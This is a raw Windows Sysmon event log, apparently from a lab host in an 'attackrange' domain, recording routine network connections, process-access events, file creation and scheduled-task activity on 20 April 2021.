14:57:29.449{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-31192-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000074751Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:29.027{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com64109-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000074750Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:28.784{A7A01FEF-B636-607E-2D00-00000000BB01}2212C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53036- 10341000x800000000000000074749Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.811{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074748Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.796{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074747Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.780{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074746Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.780{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000074745Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.780{A7A01FEF-B626-607E-1100-00000000BB01}1176NT AUTHORITY\LOCAL SERVICEC:\Windows\system32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\FontCache-Obsolete-484.datMD5=362964F31AE24EFB0D0A77A1D4A02A1C,SHA256=51D6CD78B97503795F22A88AA5422AC5293BAC188805FC44BDFD8A135A915F1A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000074744Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.764{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074743Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.764{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074742Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.749{A7A01FEF-B626-607E-1400-00000000BB01}12763692C:\Windows\system32\svchost.exe{A7A01FEF-EBDA-607E-BA0C-00000000BB01}1992C:\Program Files\Microsoft Office\root\integration\integrator.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\cryptsvc.dll+6124|c:\windows\system32\cryptsvc.dll+5e34|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074741Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.749{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074740Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.749{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074739Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.737{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074738Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.717{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074737Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.717{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074736Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.702{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074735Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.702{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074734Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.686{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074733Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.671{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBDA-607E-CD0C-00000000BB01}3960C:\Windows\system32\schtasks.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074732Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.671{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBDA-607E-CD0C-00000000BB01}3960C:\Windows\system32\schtasks.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000074731Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.671{A7A01FEF-EBDA-607E-CD0C-00000000BB01}3960C:\Windows\System32\schtasks.exeC:\Windows\System32\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=A0180EEE2521DC7847458E0BDC673DBD,SHA256=987A1EA9876E266B68CBB962BECF4BDD8794765DED0ED15B55490A30ED00DD2B,IMPHASH=2C7BF5CADC559377391AFDF385763E3CtrueMicrosoft WindowsValid 10341000x800000000000000074730Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.671{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000074729Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.671{A7A01FEF-B626-607E-1100-00000000BB01}1176NT AUTHORITY\LOCAL SERVICEC:\Windows\system32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\FontCache-Obsolete-375.datMD5=282FF5A4E591E68603C90D7E59EB6D16,SHA256=686C2ABC83117ED90D857CB20E7645FD757052C208C74AA1C2B7CB68300BAA1A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000074728Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.671{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBDA-607E-CD0C-00000000BB01}3960C:\Windows\system32\schtasks.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074727Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.655{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074726Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.655{A7A01FEF-EBDA-607E-CE0C-00000000BB01}45082600C:\Windows\system32\conhost.exe{A7A01FEF-EBDA-607E-CD0C-00000000BB01}3960C:\Windows\system32\schtasks.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074725Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.639{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074724Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.639{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBDA-607E-CE0C-00000000BB01}4508C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 23542300x800000000000000074723Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.639{A7A01FEF-EBDA-607E-BA0C-00000000BB01}1992NT AUTHORITY\SYSTEMC:\Program Files\Microsoft Office\root\integration\integrator.exeC:\Windows\Temp\WIN-DC-339-20210420-1457.logMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000074722Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.624{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBDA-607E-CD0C-00000000BB01}3960C:\Windows\system32\schtasks.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074721Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.624{A7A01FEF-EAF3-607E-6E0B-00000000BB01}50923308C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe{A7A01FEF-EBDA-607E-CD0C-00000000BB01}3960C:\Windows\system32\schtasks.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+108db1|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+108beb|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+39526d|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+395170|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+4a7fcf|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+43494a|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+434cc5|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+47afbb|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+b0474|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+c5a8d|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+c3bf7|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+188f9a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074720Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.624{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074719Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.624{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074718Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.608{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x800000000000000074717Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT10532021-04-20 14:57:30.608{A7A01FEF-B626-607E-1600-00000000BB01}1540C:\Windows\system32\svchost.exeC:\Windows\System32\Tasks\Microsoft\Office\Office Automatic Updates 2.02021-04-20 14:57:30.608 10341000x800000000000000074716Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.592{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBDA-607E-CB0C-00000000BB01}6348C:\Windows\system32\schtasks.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074715Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.592{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBDA-607E-CB0C-00000000BB01}6348C:\Windows\system32\schtasks.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074714Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.592{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000074713Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 